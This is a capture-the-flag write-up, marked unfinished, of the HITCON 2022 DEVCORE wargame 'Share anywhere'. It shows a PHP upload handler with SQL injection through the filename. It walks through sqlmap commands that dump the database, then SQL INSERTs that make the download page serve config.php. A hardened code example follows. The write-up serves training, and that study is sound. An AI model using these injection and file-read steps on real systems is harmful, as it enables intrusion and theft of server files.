---
title: 'DEVCORE HITCON 2022 Wargame'
disqus: hackmd
---
DEVCORE HITCON 2022 Wargame: Share anywhere (unfinished)
===
## Table of Contents
[TOC]
## Topic
HITCON 2022 x DEVCORE Wargame
https://github.com/DEVCORE-Wargame/HITCON-2022
●Edit /share-anywhere/src/upload.php
```php=
if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
upload($_FILES['file']['name'], $_FILES['file']['tmp_name']);
}
```
●LAB: http://chw.com:8989/

## Solution
### 1. Attempt
●Create test.php

#### 1.1 Upload method 1
●curl --upload-file ./test.php http://chw.com:8989/

> Response: http://chw.com:8989/download.php?id=3C8B6421-AFF9-4770-AB43-8000F77275A5
#### 1.2 Upload method 2
●curl -F 'file=@./test.php' http://chw.com:8989/upload.php

> Response: http://chw.com:8989/download.php?id=9E015401-43EF-4D40-9BB9-2124FC494EA3
#### 1.3 Download example with curl
●curl -O -J 'http://chw.com:8989/download.php?id=9E015401-43EF-4D40-9BB9-2124FC494EA3'

#### 1.4 Download example with wget
●wget --content-disposition 'http://chw.com:8989/download.php?id=3C8B6421-AFF9-4770-AB43-8000F77275A5'

> Response: ‘test.php.2’ saved
#### 1.5 Check your file
●cat test.php.2

#### 1.6 Or, if no filename was provided at upload time
●cat 9E015401-43EF-4D40-9BB9-2124FC494EA3.bin

### 2. White-box review shows the flag is stored in config.php
config.php
```php=
<?php
require_once('database.php');
require_once('functions.php');

if ($_SERVER['REQUEST_METHOD'] == 'PUT') {
    $path = parse_url($_SERVER['REQUEST_URI'])['path'];
    $basename = basename($path);
    if (empty($basename)) {
        $basename = guid().'.bin';
    }
    upload($basename, 'php://input');
}

if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
    upload($_FILES['file']['name'], $_FILES['file']['tmp_name']);
}

##################################################
function upload($filename, $upload_filepath) {
    $physical_path = '/uploads/'.guid();
    copy($upload_filepath, $physical_path);
    $guid = guid();
    if (empty($filename)) {
        $filename = $guid.'.bin';
    }
    ##################################################
    $pdo = get_pdo();
    // $filename comes straight from the client (PUT path or multipart file name)
    // and is interpolated into the query unescaped: this is the injection point.
    $sql = "INSERT INTO files (guid, physical_path, filename) VALUES ('$guid', '$physical_path', '$filename')";
    $result = $pdo->exec($sql);
    if ($result == 1) {
        $protocol = ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') || $_SERVER['SERVER_PORT'] == 443 || $_SERVER['HTTP_X_FORWARDED_PORT'] == 443) ? 'https' : 'http';
        echo "$protocol://${_SERVER['HTTP_HOST']}/download.php?id=$guid";
    } else {
        echo 'Error';
    }
    exit();
}
```
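For contrast, here is a hardened version of the same two operations (the `INSERT` in `upload()` and the `id` lookup that `download.php` performs). This is an added example, not code from the wargame; it assumes the page's `files` table (`guid`, `physical_path`, `filename`), the `guid()` and `get_pdo()` helpers from `functions.php`/`database.php`, and an uploads directory at `/uploads`.

```php
<?php
// Added example (not the wargame's own code). Assumes guid() and get_pdo() from the
// page, the same `files` table, and that uploads live under UPLOAD_DIR (assumption).
const UPLOAD_DIR = '/uploads';

// Store the upload and record it with a parameterized INSERT, so a user-supplied
// $filename can no longer break out of the SQL string.
function upload_safe(PDO $pdo, string $filename, string $upload_filepath): string {
    $guid = guid();
    $physical_path = UPLOAD_DIR . '/' . guid();
    if ($filename === '') {
        $filename = $guid . '.bin';
    }
    // Keep only a base name so the stored download name carries no path parts.
    $filename = basename($filename);
    if (!copy($upload_filepath, $physical_path)) {
        throw new RuntimeException('copy failed');
    }
    $stmt = $pdo->prepare(
        'INSERT INTO files (guid, physical_path, filename) VALUES (:guid, :path, :name)'
    );
    $stmt->execute([':guid' => $guid, ':path' => $physical_path, ':name' => $filename]);
    return $guid;
}

// Look up a download with a bound parameter, then refuse to serve any
// physical_path that does not resolve inside UPLOAD_DIR. Even if a row pointing at
// /var/www/html/config.php were planted, the realpath check rejects it.
function resolve_download(PDO $pdo, string $id): ?array {
    $stmt = $pdo->prepare('SELECT physical_path, filename FROM files WHERE guid = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    $real = realpath($row['physical_path']);
    $base = realpath(UPLOAD_DIR);
    if ($real === false || $base === false || strpos($real, $base . '/') !== 0) {
        return null; // outside the uploads directory: treat as not found
    }
    return ['path' => $real, 'filename' => basename($row['filename'])];
}
```

The second check matters independently of the first: parameterizing the queries stops the injection, while the `realpath` containment check limits the damage if a `physical_path` row is ever written by some other route.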
### 3. Sqlmap Tools
#### [Introduction to SQLmap: an open-source penetration testing tool](https://feifei.tw/security-tool-sqlmap/#:~:text=SQLmap%20%E6%98%AF%E4%B8%80%E5%80%8B%E9%96%8B%E6%BA%90%E7%9A%84,%E4%BD%9C%E6%A5%AD%E7%B3%BB%E7%B5%B1%E4%B8%8A%E5%9F%B7%E8%A1%8C%E5%91%BD%E4%BB%A4%E3%80%82)
#### 3.1 List All Databases
> sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --dbs --batch

#### 3.2 Enumerate DBMS database
> sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" -D "web" --tables

#### 3.3 Enumerate DBMS database table entries
> sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" -T "files" --dump

#### 3.4 Using --sql-shell to INSERT a row with a specific path
> sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --sql-shell
> sql-shell> INSERT INTO files (guid, physical_path, filename) VALUES ('42','/var/www/html/upload.php','upload.php');
#### 3.5 [Attempt] GET upload.php
> curl http://chw.com:8989/download.php?id=42

**success !!!**
#### 3.6 Using --sql-shell to INSERT config.php path
> sqlmap -u "http://chw.com:8989/download.php?id=BB3904BA-BC29-4CB9-97A2-B1B3FDE7E6FF" --sql-shell
> sql-shell> INSERT INTO files (guid, physical_path, filename) VALUES ('44','/var/www/html/config.php','config.php');
#### 3.7 GET config.php
> curl http://chw.com:8989/download.php?id=44

### 4. Get FLAG {waku_waku_y0u_f0und_m3!}
###### tags: `CTF` `Web` `Sqlmap` `SQL-Injection`